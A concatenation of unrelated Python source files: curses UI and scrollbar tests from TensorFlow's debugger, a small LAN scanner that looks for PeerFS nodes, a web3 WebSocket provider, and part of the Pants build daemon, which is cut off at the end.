self.assertEqual(["| babble again | ahoy | "], ui.main_menu_list[0].lines)
self.assertEqual(1, len(ui.main_menu_list[0].font_attr_segs))
self.assertEqual(1, len(ui.main_menu_list[0].font_attr_segs[0]))
item_annot = ui.main_menu_list[0].font_attr_segs[0][0]
self.assertEqual(2, item_annot[0])
self.assertEqual(14, item_annot[1])
self.assertEqual("babble", item_annot[2][0].content)
self.assertEqual("underline", item_annot[2][1])
# The output from the menu-triggered command does not have a menu.
self.assertIsNone(ui.main_menu_list[1])
def testMouseClickOnDisabledMenuItemTriggersNoCommand(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 10 -m\n"),
# A click on the disabled menu item.
[curses.KEY_MOUSE, 18, 1],
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
def testNavigationUsingCommandLineWorks(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2\n"),
string_to_codes("babble -n 4\n"),
string_to_codes("prev\n"),
string_to_codes("next\n"),
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[3].lines)
def testNavigationOverOldestLimitUsingCommandLineGivesCorrectWarning(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2\n"),
string_to_codes("babble -n 4\n"),
string_to_codes("prev\n"),
string_to_codes("prev\n"), # Navigate over oldest limit.
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
self.assertEqual("At the OLDEST in navigation history!", ui.toasts[-2])
def testNavigationOverLatestLimitUsingCommandLineGivesCorrectWarning(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2\n"),
string_to_codes("babble -n 4\n"),
string_to_codes("prev\n"),
string_to_codes("next\n"),
string_to_codes("next\n"), # Navigate over latest limit.
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[3].lines)
self.assertEqual("At the LATEST in navigation history!", ui.toasts[-2])
def testMouseClicksOnNavBarWorks(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2\n"),
string_to_codes("babble -n 4\n"),
# A click on the back (prev) button of the nav bar.
[curses.KEY_MOUSE, 3, 1],
# A click on the forward (prev) button of the nav bar.
[curses.KEY_MOUSE, 7, 1],
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[3].lines)
def testMouseClicksOnNavBarAfterPreviousScrollingWorks(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2\n"),
[curses.KEY_NPAGE], # Scroll down one line.
string_to_codes("babble -n 4\n"),
# A click on the back (prev) button of the nav bar.
[curses.KEY_MOUSE, 3, 1],
# A click on the forward (prev) button of the nav bar.
[curses.KEY_MOUSE, 7, 1],
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(6, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
# From manual scroll.
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[1].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[2].lines)
# From history navigation.
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[3].lines)
# From history navigation's auto-scroll to history scroll position.
self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[4].lines)
self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[5].lines)
self.assertEqual(6, len(ui.scroll_messages))
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[1])
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[2])
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[3])
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[4])
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[5])
class ScrollBarTest(test_util.TensorFlowTestCase):
def testConstructorRaisesExceptionForNotEnoughHeight(self):
with self.assertRaisesRegexp(
ValueError, r"Insufficient height for ScrollBar \(2\)"):
curses_ui.ScrollBar(0, 0, 1, 1, 0, 0)
def testLayoutIsEmptyForZeroRow(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 0)
layout = scroll_bar.layout()
self.assertEqual([" "] * 8, layout.lines)
self.assertEqual({}, layout.font_attr_segs)
def testLayoutIsEmptyFoOneRow(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 1)
layout = scroll_bar.layout()
self.assertEqual([" "] * 8, layout.lines)
self.assertEqual({}, layout.font_attr_segs)
def testClickCommandForOneRowIsNone(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 1)
self.assertIsNone(scroll_bar.get_click_command(0))
self.assertIsNone(scroll_bar.get_click_command(3))
self.assertIsNone(scroll_bar.get_click_command(7))
self.assertIsNone(scroll_bar.get_click_command(8))
def testLayoutIsCorrectForTopPosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 20)
layout = scroll_bar.layout()
self.assertEqual(["UP"] + [" "] * 6 + ["DN"], layout.lines)
self.assertEqual(
{0: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
1: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
7: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)]},
layout.font_attr_segs)
def testWidth1LayoutIsCorrectForTopPosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 0, 7, 0, 20)
layout = scroll_bar.layout()
self.assertEqual(["U"] + [" "] * 6 + ["D"], layout.lines)
self.assertEqual(
{0: [(0, 1, curses_ui.ScrollBar.BASE_ATTR)],
1: [(0, 1, curses_ui.ScrollBar.BASE_ATTR)],
7: [(0, 1, curses_ui.ScrollBar.BASE_ATTR)]},
layout.font_attr_segs)
def testWidth3LayoutIsCorrectForTopPosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 2, 7, 0, 20)
layout = scroll_bar.layout()
self.assertEqual(["UP "] + [" "] * 6 + ["DN "], layout.lines)
self.assertEqual(
{0: [(0, 3, curses_ui.ScrollBar.BASE_ATTR)],
1: [(0, 3, curses_ui.ScrollBar.BASE_ATTR)],
7: [(0, 3, curses_ui.ScrollBar.BASE_ATTR)]},
layout.font_attr_segs)
def testWidth4LayoutIsCorrectForTopPosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 3, 7, 0, 20)
layout = scroll_bar.layout()
self.assertEqual([" UP "] + [" "] * 6 + ["DOWN"], layout.lines)
self.assertEqual(
{0: [(0, 4, curses_ui.ScrollBar.BASE_ATTR)],
1: [(0, 4, curses_ui.ScrollBar.BASE_ATTR)],
7: [(0, 4, curses_ui.ScrollBar.BASE_ATTR)]},
layout.font_attr_segs)
def testLayoutIsCorrectForBottomPosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 19, 20)
layout = scroll_bar.layout()
self.assertEqual(["UP"] + [" "] * 6 + ["DN"], layout.lines)
self.assertEqual(
{0: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
6: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
7: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)]},
layout.font_attr_segs)
def testLayoutIsCorrectForMiddlePosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 10, 20)
layout = scroll_bar.layout()
self.assertEqual(["UP"] + [" "] * 6 + ["DN"], layout.lines)
self.assertEqual(
{0: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
3: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
7: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)]},
layout.font_attr_segs)
def testClickCommandsAreCorrectForMiddlePosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 10, 20)
self.assertIsNone(scroll_bar.get_click_command(-1))
self.assertEqual(curses_ui._SCROLL_UP_A_LINE,
scroll_bar.get_click_command(0))
self.assertEqual(curses_ui._SCROLL_UP,
scroll_bar.get_click_command(1))
self.assertEqual(curses_ui._SCROLL_UP,
scroll_bar.get_click_command(2))
self.assertIsNone(scroll_bar.get_click_command(3))
self.assertEqual(curses_ui._SCROLL_DOWN,
scroll_bar.get_click_command(5))
self.assertEqual(curses_ui._SCROLL_DOWN,
scroll_bar.get_click_command(6))
self.assertEqual(curses_ui._SCROLL_DOWN_A_LINE,
scroll_bar.get_click_command(7))
self.assertIsNone(scroll_bar.get_click_command(8))
def testClickCommandsAreCorrectForBottomPosition(self):
scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 19, 20)
self.assertIsNone(scroll_bar.get_click_command(-1))
self.assertEqual(curses_ui._SCROLL_UP_A_LINE,
scroll_bar.get_click_command(0))
for i in range(1, 6):
self.assertEqual(curses_ui._SCROLL_UP,
scroll_bar.get_click_command(i))
self.assertIsNone(scroll_bar.get_click_command(6))
self.assertEqual(curses_ui._SCROLL_DOWN_A_LINE,
scroll_bar.get_click_command(7))
self.assertIsNone(scroll_bar.get_click_command(8))
def testClickCommandsAreCorrectForScrollBarNotAtZeroMinY(self):
scroll_bar = curses_ui.ScrollBar(0, 5, 1, 12, 10, 20)
self.assertIsNone(scroll_bar.get_click_command(0))
self.assertIsNone(scroll_bar.get_click_command(4))
self.assertEqual(curses_ui._SCROLL_UP_A_LINE,
scroll_bar.get_click_command(5))
self.assertEqual(curses_ui._SCROLL_UP,
scroll_bar.get_click_command(6))
self.assertEqual(curses_ui._SCROLL_UP,
scroll_bar.get_click_command(7))
self.assertIsNone(scroll_bar.get_click_command(8))
self.assertEqual(curses_ui._SCROLL_DOWN,
scroll_bar.get_click_command(10))
self.assertEqual(curses_ui._SCROLL_DOWN,
scroll_bar.get_click_command(11))
self.assertEqual(curses_ui._SCROLL_DOWN_A_LINE,
scroll_bar.get_click_command(12))
self.assertIsNone(scroll_bar.get_click_command(13))
if __name__ == "__main__":
googletest.main()
|
nodefinder.py | from threading import Thread, Lock
from time import perf_counter
from sys import stderr
from time import sleep
import socket, requests
BASE_IP = "192.168.1.%i"
CHECKPORT = 18623
SERVERPORT = 18623
IPS = []
activenodes = []
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
class Threader:
def __init__(self, threads=30):
self.thread_lock = Lock()
self.functions_lock = Lock()
self.functions = []
self.threads = []
self.nthreads = threads
self.running = True
self.print_lock = Lock()
def stop(self) -> None:
self.running = False
def append(self, function, *args) -> None:
self.functions.append((function, args))
def start(self) -> None:
for i in range(self.nthreads):
thread = Thread(target=self.worker, daemon=True)
thread._args = (thread, )
self.threads.append(thread)
thread.start()
def join(self) -> None:
for thread in self.threads:
thread.join()
def worker(self, thread:Thread) -> None:
while self.running and (len(self.functions) > 0):
with self.functions_lock:
function, args = self.functions.pop(0)
function(*args)
with self.thread_lock:
self.threads.remove(thread)
start = perf_counter()
socket.setdefaulttimeout(0.1)
def connect(hostname, port):
global IPS
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
result = sock.connect_ex((hostname, port))
with threader.print_lock:
if result == 0:
stderr.write(f"[{perf_counter() - start:.5f}] PeerFS port found at {hostname}\n")
IPS.append(hostname)
threader = Threader(10)
for i in range(255):
threader.append(connect, BASE_IP%i, CHECKPORT)
threader.start()
threader.join()
print(f"[{perf_counter() - start:.5f}] Done searching for ips")
for ip in IPS:
try:
r = requests.get(f"http://{ip}:{SERVERPORT}/fetchstats")
print(f"[{perf_counter() - start:.5f}] Found an active node at " + ip + "!")
activenodes.append(ip)
except:
print(f"[{perf_counter() - start:.5f}] {ip} is not running a node.")
|
websocket.py | import asyncio
import json
import logging
import os
from threading import (
Thread,
)
from types import (
TracebackType,
)
from typing import (
Any,
Optional,
Type,
Union,
)
from eth_typing import (
URI,
)
from websockets.client import (
connect,
)
from websockets.legacy.client import (
WebSocketClientProtocol,
)
from web3.exceptions import (
ValidationError,
)
from web3.providers.base import (
JSONBaseProvider,
)
from web3.types import (
RPCEndpoint,
RPCResponse,
)
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop: asyncio.AbstractEventLoop) -> None:
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def _get_threaded_loop() -> asyncio.AbstractEventLoop:
new_loop = asyncio.new_event_loop()
thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
thread_loop.start()
return new_loop
def get_default_endpoint() -> URI:
return URI(os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546'))
class PersistentWebSocket:
def __init__(
self, endpoint_uri: URI, loop: asyncio.AbstractEventLoop, websocket_kwargs: Any
) -> None:
self.ws: WebSocketClientProtocol = None
self.endpoint_uri = endpoint_uri
self.loop = loop
self.websocket_kwargs = websocket_kwargs
async def __aenter__(self) -> WebSocketClientProtocol:
if self.ws is None:
self.ws = await connect(
uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
)
return self.ws
async def __aexit__(
self, exc_type: Type[BaseException], exc_val: BaseException, exc_tb: TracebackType
) -> None:
if exc_val is not None:
try:
await self.ws.close()
except Exception:
pass
self.ws = None
class WebsocketProvider(JSONBaseProvider):
logger = logging.getLogger("web3.providers.WebsocketProvider")
_loop = None
def __init__(
self,
endpoint_uri: Optional[Union[URI, str]] = None,
websocket_kwargs: Optional[Any] = None,
websocket_timeout: int = DEFAULT_WEBSOCKET_TIMEOUT,
) -> None:
self.endpoint_uri = URI(endpoint_uri)
self.websocket_timeout = websocket_timeout
if self.endpoint_uri is None:
self.endpoint_uri = get_default_endpoint()
if WebsocketProvider._loop is None:
WebsocketProvider._loop = _get_threaded_loop()
if websocket_kwargs is None:
websocket_kwargs = {}
else:
found_restricted_keys = set(websocket_kwargs.keys()).intersection(
RESTRICTED_WEBSOCKET_KWARGS
)
if found_restricted_keys:
raise ValidationError(
'{0} are not allowed in websocket_kwargs, '
'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
)
self.conn = PersistentWebSocket(
self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
)
super().__init__()
def __str__(self) -> str:
return "WS connection {0}".format(self.endpoint_uri)
async def coro_make_request(self, request_data: bytes) -> RPCResponse:
async with self.conn as conn:
await asyncio.wait_for(
conn.send(request_data),
timeout=self.websocket_timeout
)
return json.loads(
await asyncio.wait_for(
conn.recv(),
timeout=self.websocket_timeout
)
)
def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
self.logger.debug("Making request WebSocket. URI: %s, "
"Method: %s", self.endpoint_uri, method)
request_data = self.encode_rpc_request(method, params)
future = asyncio.run_coroutine_threadsafe(
self.coro_make_request(request_data),
WebsocketProvider._loop
)
return future.result()
|
pants_daemon.py | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import sys
import threading
from contextlib import contextmanager
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exception_sink import ExceptionSink, SignalHandler
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonPantsRunner
from pants.engine.native import Native
from pants.init.engine_initializer import EngineInitializer
from pants.init.logging import init_rust_logger, setup_logging
from pants.init.options_initializer import BuildConfigInitializer
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.pants_service import PantsServices
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.service.store_gc_service import StoreGCService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.collections import combined_dict
from pants.util.contextutil import stdio_as
from pants.util.memo import memoized_property
from pants.util.objects import datatype
from pants.util.strutil import ensure_text
class _LoggerStream(object):
"""A sys.std{out,err} replacement that pipes output to a logger.
N.B. `logging.Logger` expects unicode. However, most of our outstream logic, such as in `exiter.py`,
will use `sys.std{out,err}.buffer` and thus a bytes interface. So, we must provide a `buffer`
property, and change the semantics of the buffer to always convert the message to unicode. This
is an unfortunate code smell, as `logging` does not expose a bytes interface so this is
the best solution we could think of.
"""
def __init__(self, logger, log_level, handler):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param Handler handler: The underlying log handler, for determining the fileno
to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._handler = handler
def write(self, msg):
msg = ensure_text(msg)
for line in msg.rstrip().splitlines():
# The log only accepts text, and will raise a decoding error if the default encoding is ascii
# if provided a bytes input for unicode text.
line = ensure_text(line)
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._handler.stream.fileno()
@property
def buffer(self):
return self
class PantsDaemonSignalHandler(SignalHandler):
def __init__(self, daemon):
super().__init__()
self._daemon = daemon
def handle_sigint(self, signum, _frame):
self._daemon.terminate(include_watchman=False)
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception):
"""Represents a failure to start pantsd."""
class RuntimeFailure(Exception):
"""Represents a pantsd failure at runtime, usually from an underlying service failure."""
class Handle(datatype([('pid', int), ('port', int), ('metadata_base_dir', str)])):
"""A handle to a "probably running" pantsd instance.
We attempt to verify that the pantsd instance is still running when we create a Handle, but
after it has been created it is entirely process that the pantsd instance perishes.
"""
class Factory:
@classmethod
def maybe_launch(cls, options_bootstrapper):
"""Creates and launches a daemon instance if one does not already exist.
:param OptionsBootstrapper options_bootstrapper: The bootstrap options.
:returns: A Handle for the running pantsd instance.
:rtype: PantsDaemon.Handle
"""
stub_pantsd = cls.create(options_bootstrapper, full_init=False)
with stub_pantsd._services.lifecycle_lock:
if stub_pantsd.needs_restart(stub_pantsd.options_fingerprint):
# Once we determine we actually need to launch, recreate with full initialization.
pantsd = cls.create(options_bootstrapper)
return pantsd.launch()
else:
# We're already launched.
return PantsDaemon.Handle(
stub_pantsd.await_pid(10),
stub_pantsd.read_named_socket('pailgun', int),
stub_pantsd._metadata_base_dir,
)
@classmethod
def restart(cls, options_bootstrapper):
"""Restarts a running daemon instance.
:param OptionsBootstrapper options_bootstrapper: The bootstrap options.
:returns: A Handle for the pantsd instance.
:rtype: PantsDaemon.Handle
"""
pantsd = cls.create(options_bootstrapper)
with pantsd._services.lifecycle_lock:
# N.B. This will call `pantsd.terminate()` before starting.
return pantsd.launch()
@classmethod
def create(cls, options_bootstrapper, full_init=True):
"""
:param OptionsBootstrapper options_bootstrapper: The bootstrap options.
:param bool full_init: Whether or not to fully initialize an engine et al for the purposes
of spawning a new daemon. `full_init=False` is intended primarily
for lightweight lifecycle checks (since there is a ~1s overhead to
initialize the engine). See the impl of `maybe_launch` for an example
of the intended usage.
"""
bootstrap_options = options_bootstrapper.bootstrap_options
bootstrap_options_values = bootstrap_options.for_global_scope()
# TODO: https://github.com/pantsbuild/pants/issues/3479
watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
if full_init:
build_root = get_buildroot()
native = Native()
build_config = BuildConfigInitializer.get(options_bootstrapper)
legacy_graph_scheduler = EngineInitializer.setup_legacy_graph(native,
options_bootstrapper,
build_config)
services = cls._setup_services(
build_root,
bootstrap_options_values,
legacy_graph_scheduler,
watchman
)
else:
build_root = None
native = None
services = PantsServices()
return PantsDaemon(
native=native,
build_root=build_root,
work_dir=bootstrap_options_values.pants_workdir,
log_level=bootstrap_options_values.level.upper(),
services=services,
metadata_base_dir=bootstrap_options_values.pants_subprocessdir,
bootstrap_options=bootstrap_options
)
@staticmethod
def _setup_services(build_root, bootstrap_options, legacy_graph_scheduler, watchman):
"""Initialize pantsd services.
:returns: A PantsServices instance.
"""
should_shutdown_after_run = bootstrap_options.shutdown_pantsd_after_run
fs_event_service = FSEventService(
watchman,
build_root,
)
pidfile_absolute = PantsDaemon.metadata_file_path('pantsd', 'pid', bootstrap_options.pants_subprocessdir)
if pidfile_absolute.startswith(build_root):
pidfile = os.path.relpath(pidfile_absolute, build_root)
else:
pidfile = None
logging.getLogger(__name__).warning(
'Not watching pantsd pidfile because subprocessdir is outside of buildroot. Having '
'subprocessdir be a child of buildroot (as it is by default) may help avoid stray '
'pantsd processes.'
)
scheduler_service = SchedulerService(
fs_event_service,
legacy_graph_scheduler,
build_root,
PantsDaemon.compute_invalidation_globs(bootstrap_options),
pidfile,
)
pailgun_service = PailgunService(
(bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
DaemonPantsRunner,
scheduler_service,
should_shutdown_after_run,
)
store_gc_service = StoreGCService(legacy_graph_scheduler.scheduler)
return PantsServices(
services=(fs_event_service, scheduler_service, pailgun_service, store_gc_service),
port_map=dict(pailgun=pailgun_service.pailgun_port),
)
@staticmethod
def compute_invalidation_globs(bootstrap_options):
"""
Combine --pythonpath and --pants_config_files(pants.ini) files that are in {buildroot} dir
with those invalidation_globs provided by users
:param bootstrap_options:
:return: A list of invalidation_globs
"""
buildroot = get_buildroot()
invalidation_globs = []
globs = bootstrap_options.pythonpath + \
bootstrap_options.pants_config_files + \
bootstrap_options.pantsd_invalidation_globs
for glob in globs:
glob_relpath = os.path.relpath(glob, buildroot)
if glob_relpath and (not glob_relpath.startswith("../")):
invalidation_globs.extend([glob_relpath, glob_relpath + '/**'])
else:
logging.getLogger(__name__).warning("Changes to {}, outside of the buildroot"
", will not be invalidated.".format(glob))
return invalidation_globs
def __init__(self, native, build_root, work_dir, log_level, services,
metadata_base_dir, bootstrap_options=None):
"""
:param Native native: A `Native` instance.
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param PantsServices services: A registry of services to use in this run.
:param string metadata_base_dir: The ProcessManager metadata base dir.
:param Options bootstrap_options: The bootstrap options, if available.
"""
super().__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._native = native
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._services = services
self._bootstrap_options = bootstrap_options
self._log_show_rust_3rdparty = bootstrap_options.for_global_scope().log_show_rust_3rdparty if bootstrap_options else True
self._log_dir = os.path.join(work_dir, self.name)
self._logger = logging.getLogger(__name__)
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
@memoized_property
def watchman_launcher(self):
return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
@property
def is_killed(self):
return self._kill_switch.is_set()
@property
def options_fingerprint(self):
return OptionsFingerprinter.combined_options_fingerprint_for_scope(
GLOBAL_SCOPE,
self._bootstrap_options,
fingerprint_key='daemon',
invert=True
)
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
with self._services.lifecycle_lock:
for service, service_thread in service_thread_map.items():
self._logger.info('terminating pantsd service: {}'.format(service))
service.terminate()
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_stdio():
"""Close stdio streams to avoid output in the tty that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
@contextmanager
def _pantsd_logging(self):
"""A context manager that runs with pantsd logging.
Asserts that stdio (represented by file handles 0, 1, 2) is closed to ensure that
we can safely reuse those fd numbers.
"""
# Ensure that stdio is closed so that we can safely reuse those file descriptors.
for fd in (0, 1, 2):
try:
os.fdopen(fd)
raise AssertionError(
'pantsd logging cannot initialize while stdio is open: {}'.format(fd))
except OSError:
pass
# Redirect stdio to /dev/null for the rest of the run, to reserve those file descriptors
# for further forks.
with stdio_as(stdin_fd=-1, stdout_fd=-1, stderr_fd=-1):
# Reinitialize logging for the daemon context.
init_rust_logger(self._log_level, self._log_show_rust_3rdparty)
result = setup_logging(self._log_level, log_dir=self._log_dir, log_name=self.LOG_NAME, native=self._native)
self._native.override_thread_logging_destination_to_just_pantsd()
# Do a python-level redirect of stdout/stderr, which will not disturb `0,1,2`.
# TODO: Consider giving these pipes/actual fds, in order to make them "deep" replacements
# for `1,2`, and allow them to be used via `stdio_as`.
sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_handler)
sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_handler)
self._logger.debug('logging initialized')
yield (result.log_handler.stream, result.log_handler.native_filename)
def _setup_services(self, pants_services):
for service in pants_services.services:
self._logger.info('setting up service {}'.format(service))
service.setup(self._services)
@staticmethod
def _make_thread(service):
name = "{}Thread".format(service.__class__.__name__)
def target():
Native().override_thread_logging_destination_to_just_pantsd()
service.run()
t = threading.Thread(target=target, name=name)
t.daemon = True
return t
def _run_services(self, pants_services):
"""Service runner main loop."""
if not pants_services.services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: self._make_thread(service)
for service in pants_services.services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info('starting service {}'.format(service))
try:
service_thread.start()
except (RuntimeError, FSEventService.ServiceError):
self.shutdown(service_thread_map)
raise PantsDaemon.StartupFailure('service {} failed to start, shutting down!'.format(service))
# Once all services are started, write our pid.
self.write_pid()
self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, ensure_text(self.options_fingerprint))
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise PantsDaemon.RuntimeFailure('service failure for {}, shutting down!'.format(service))
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
"""Synchronously run pantsd."""
# Switch log output to the daemon's log stream from here forward.
self._close_stdio()
with self._pantsd_logging() as (log_stream, log_filename):
# Register an exiter using os._exit to ensure we only close stdio streams once.
ExceptionSink.reset_exiter(Exiter(exiter=os._exit))
# We don't have any stdio streams to log to anymore, so we log to a file.
# We don't override the faulthandler destination because the stream we get will proxy things
# via the rust logging code, and faulthandler needs to be writing directly to a real file
# descriptor. When pantsd logging was originally initialised, we already set up faulthandler
# to log to the correct file descriptor, so don't override it.
#
# We can get tracebacks of the pantsd process by tailing the pantsd log and sending it
# SIGUSR2.
ExceptionSink.reset_interactive_output_stream(
log_stream,
override_faulthandler_destination=False,
)
# Reset the log location and the backtrace preference from the global bootstrap options.
global_bootstrap_options = self._bootstrap_options.for_global_scope()
ExceptionSink.reset_should_print_backtrace_to_terminal(
global_bootstrap_options.print_exception_stacktrace)
ExceptionSink.reset_log_location(global_bootstrap_options.pants_workdir)
self._native.set_panic_handler()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title('pantsd [{}]'.format(self._build_root))
# Write service socket information to .pids.
self._write_named_sockets(self._services.port_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemon_spawn()."""
entry_point = '{}:launch'.format(__name__)
exec_env = combined_dict(os.environ, dict(PANTS_ENTRYPOINT=entry_point))
# Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
cmd = [sys.executable] + sys.argv
self._logger.debug('cmd is: PANTS_ENTRYPOINT={} {}'.format(entry_point, ' '.join(cmd)))
# TODO: Improve error handling on launch failures.
os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def needs_launch(self):
"""Determines if pantsd needs to be launched.
N.B. This should always be called under care of the `lifecycle_lock`.
:returns: True if the daemon needs launching, False otherwise.
:rtype: bool
"""
new_fingerprint = self.options_fingerprint
self._logger.debug('pantsd: is_alive={} new_fingerprint={} current_fingerprint={}'
.format(self.is_alive(), new_fingerprint, self.fingerprint))
return self.needs_restart(new_fingerprint)
def launch(self):
"""Launches pantsd in a subprocess.
N.B. This should always be called under care of the `lifecycle_lock`.
